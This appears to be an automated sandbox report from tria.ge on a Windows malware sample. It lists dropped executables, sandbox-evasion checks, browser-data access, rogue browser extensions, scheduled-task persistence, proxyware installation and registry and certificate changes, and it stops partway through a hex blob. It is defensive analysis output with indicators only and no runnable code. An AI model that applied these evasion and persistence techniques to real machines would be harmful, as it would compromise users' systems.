Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
05/05/2024, 01:17
Static task
static1
URLScan task
urlscan1
General
Malware Config
Signatures
-
pid Process 1580 powershell.exe 3192 powershell.exe 2836 powershell.exe 6000 powershell.exe 1208 powershell.exe 4308 powershell.exe 5708 powershell.exe 4256 powershell.exe 5700 powershell.exe 768 powershell.exe 2948 powershell.EXE -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion AczmJ.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\Control Panel\International\Geo\Nation AczmJ.exe -
Executes dropped EXE 21 IoCs
pid Process 2312 how-to-install-stylu_CmOTJyRsix.tmp 4440 kmedia.exe 2588 44716T2JF7jDy3mB.exe 5400 Fdigx6RE2ZstV.exe 1484 44716T2JF7jDy3mB.tmp 6044 audiograil32.exe 5420 audiograil32.exe 5496 AczmJ.exe 2808 Upy76WritOeZU.exe 4508 Upy76WritOeZU.exe 4612 Upy76WritOeZU.exe 1564 Upy76WritOeZU.exe 5652 Upy76WritOeZU.exe 5736 mL58FJENjTIb9.exe 5928 WinProxy.exe 3488 Repocket.exe 6008 AczmJ.exe 4432 Assistant_109.0.5097.45_Setup.exe_sfx.exe 2348 assistant_installer.exe 5452 assistant_installer.exe 1964 vzTkrui.exe -
Loads dropped DLL 34 IoCs
pid Process 2312 how-to-install-stylu_CmOTJyRsix.tmp 2312 how-to-install-stylu_CmOTJyRsix.tmp 2312 how-to-install-stylu_CmOTJyRsix.tmp 1484 44716T2JF7jDy3mB.tmp 5400 Fdigx6RE2ZstV.exe 5400 Fdigx6RE2ZstV.exe 5400 Fdigx6RE2ZstV.exe 5400 Fdigx6RE2ZstV.exe 5400 Fdigx6RE2ZstV.exe 5400 Fdigx6RE2ZstV.exe 5400 Fdigx6RE2ZstV.exe 5400 Fdigx6RE2ZstV.exe 5400 Fdigx6RE2ZstV.exe 2808 Upy76WritOeZU.exe 4508 Upy76WritOeZU.exe 4612 Upy76WritOeZU.exe 1564 Upy76WritOeZU.exe 5652 Upy76WritOeZU.exe 5928 WinProxy.exe 5928 WinProxy.exe 3488 Repocket.exe 3488 Repocket.exe 3488 Repocket.exe 3488 Repocket.exe 3488 Repocket.exe 3488 Repocket.exe 3488 Repocket.exe 3488 Repocket.exe 3488 Repocket.exe 3488 Repocket.exe 2348 assistant_installer.exe 2348 assistant_installer.exe 5452 assistant_installer.exe 5452 assistant_installer.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json vzTkrui.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json vzTkrui.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini AczmJ.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: Upy76WritOeZU.exe File opened (read-only) \??\F: Upy76WritOeZU.exe File opened (read-only) \??\D: Upy76WritOeZU.exe File opened (read-only) \??\F: Upy76WritOeZU.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 286 ip-api.com 326 api6.my-ip.io -
Drops file in System32 directory 31 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache vzTkrui.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 vzTkrui.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA vzTkrui.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_C66311BFC31F329FE5E6FBB46563B719 vzTkrui.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA vzTkrui.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_C66311BFC31F329FE5E6FBB46563B719 vzTkrui.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 vzTkrui.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE vzTkrui.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies vzTkrui.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content vzTkrui.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 vzTkrui.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol vzTkrui.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\gpt.ini AczmJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft vzTkrui.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 vzTkrui.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_672E22BF4DD6902F7F85F941E23571DA vzTkrui.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5 vzTkrui.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol AczmJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA vzTkrui.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5 vzTkrui.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 vzTkrui.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 vzTkrui.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData vzTkrui.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA vzTkrui.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_672E22BF4DD6902F7F85F941E23571DA vzTkrui.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Geonode\Repocket\System.Net.Http.Extensions.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\Serilog.Sinks.RollingFile.xml mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Linq.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Text.Json.dll mL58FJENjTIb9.exe File created C:\Program Files (x86)\fVkYttZyU\UnoYIQ.dll vzTkrui.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja vzTkrui.exe File created C:\Program Files\WProxy\WinProxy\p2p-sdk.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.AppContext.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Diagnostics.Tracing.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Globalization.Calendars.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.IO.Compression.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Linq.Expressions.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\Serilog.Sinks.File.pdb mL58FJENjTIb9.exe File created C:\Program Files (x86)\fVkYttZyU\SeQNkFh.xml vzTkrui.exe File created C:\Program Files\Geonode\Repocket\System.Buffers.xml mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Net.Http.Primitives.xml mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Runtime.CompilerServices.Unsafe.xml mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\NLog.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\Serilog.Sinks.Http.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Security.Cryptography.Primitives.dll mL58FJENjTIb9.exe File created C:\Program Files (x86)\ayDyxjcgnKyU2\UUDnkoTYdItQZ.dll vzTkrui.exe File created C:\Program Files (x86)\UsGoiDnTuxkJEXgxtbR\yUlZBRT.dll vzTkrui.exe File created C:\Program Files\Geonode\Repocket\Serilog.Sinks.PeriodicBatching.xml mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\Serilog.Sinks.Http.xml mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\sign_2.bat mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.IO.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Net.Sockets.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\Microsoft.Bcl.AsyncInterfaces.xml mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Runtime.InteropServices.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\Serilog.Sinks.Http.pdb mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\Microsoft.Win32.Primitives.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Numerics.Vectors.xml mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\Serilog.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\Serilog.Sinks.Loki.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Reflection.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Text.Encodings.Web.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Text.RegularExpressions.dll mL58FJENjTIb9.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi vzTkrui.exe File created C:\Program Files\Geonode\Repocket\Serilog.xml mL58FJENjTIb9.exe File created C:\Program Files (x86)\ayDyxjcgnKyU2\Zxqginc.xml vzTkrui.exe File created C:\Program Files\Geonode\Repocket\System.IO.FileSystem.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Numerics.Vectors.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Threading.Tasks.Extensions.dll mL58FJENjTIb9.exe File created C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi vzTkrui.exe File created C:\Program Files\Geonode\Repocket\NLog.xml mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\Serilog.Sinks.PeriodicBatching.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Memory.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Xml.ReaderWriter.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\Repocket.exe mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Text.Encodings.Web.xml mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Text.Json.xml mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\Serilog.Sinks.File.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Security.Cryptography.Algorithms.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\Newtonsoft.Json.xml mL58FJENjTIb9.exe File created C:\Program Files (x86)\UsGoiDnTuxkJEXgxtbR\waHGVDT.xml vzTkrui.exe File created C:\Program Files\Geonode\Repocket\Newtonsoft.Json.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\Serilog.Sinks.RollingFile.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.IO.Compression.ZipFile.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.IO.FileSystem.Primitives.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\Serilog.Sinks.File.xml mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Memory.xml mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Runtime.CompilerServices.Unsafe.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.Security.Cryptography.X509Certificates.dll mL58FJENjTIb9.exe File created C:\Program Files\Geonode\Repocket\System.ValueTuple.dll mL58FJENjTIb9.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\bSfPZYmEQVWJjHQXDZ.job schtasks.exe File created C:\Windows\Tasks\FjPrbMratJfuSiUHT.job schtasks.exe File created C:\Windows\Tasks\cUMNvhAHshrjbpT.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 56 IoCs
pid pid_target Process procid_target 5900 4440 WerFault.exe 133 5960 4440 WerFault.exe 133 5400 4440 WerFault.exe 133 3920 4440 WerFault.exe 133 2848 4440 WerFault.exe 133 4544 4440 WerFault.exe 133 5152 4440 WerFault.exe 133 5312 4440 WerFault.exe 133 5788 4440 WerFault.exe 133 5180 4440 WerFault.exe 133 2564 4440 WerFault.exe 133 5388 4440 WerFault.exe 133 6008 4440 WerFault.exe 133 5164 4440 WerFault.exe 133 5772 4440 WerFault.exe 133 1080 4440 WerFault.exe 133 1088 4440 WerFault.exe 133 4868 4440 WerFault.exe 133 5416 4440 WerFault.exe 133 2296 4440 WerFault.exe 133 5860 4440 WerFault.exe 133 5720 4440 WerFault.exe 133 2348 4440 WerFault.exe 133 2964 4440 WerFault.exe 133 4748 4440 WerFault.exe 133 4320 4440 WerFault.exe 133 4204 4440 WerFault.exe 133 2848 4440 WerFault.exe 133 1572 4440 WerFault.exe 133 2704 4440 WerFault.exe 133 5780 4440 WerFault.exe 133 5812 4440 WerFault.exe 133 5408 4440 WerFault.exe 133 4480 4440 WerFault.exe 133 5280 4440 WerFault.exe 133 404 4440 WerFault.exe 133 4612 4440 WerFault.exe 133 3884 4440 WerFault.exe 133 5108 4440 WerFault.exe 133 4644 4440 WerFault.exe 133 5444 4440 WerFault.exe 133 4020 4440 WerFault.exe 133 5484 4440 WerFault.exe 133 5912 4440 WerFault.exe 133 4536 4440 WerFault.exe 133 4544 4440 WerFault.exe 133 5928 4440 WerFault.exe 133 4888 4440 WerFault.exe 133 5444 4440 WerFault.exe 133 4812 4440 WerFault.exe 133 1696 4440 WerFault.exe 133 5796 4440 WerFault.exe 133 2432 4440 WerFault.exe 133 4648 4440 WerFault.exe 133 5796 4440 WerFault.exe 133 3180 4440 WerFault.exe 133 -
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x007b000000023d78-567.dat nsis_installer_1 behavioral1/files/0x007b000000023d78-567.dat nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6116 schtasks.exe 2616 schtasks.exe 5592 schtasks.exe 4192 schtasks.exe 4868 schtasks.exe 2768 schtasks.exe 3856 schtasks.exe 5456 schtasks.exe 5648 schtasks.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS AczmJ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName AczmJ.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" AczmJ.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" vzTkrui.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309dcb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 AczmJ.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" AczmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix vzTkrui.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" AczmJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket vzTkrui.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000_Classes\Local Settings msedge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Upy76WritOeZU.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c97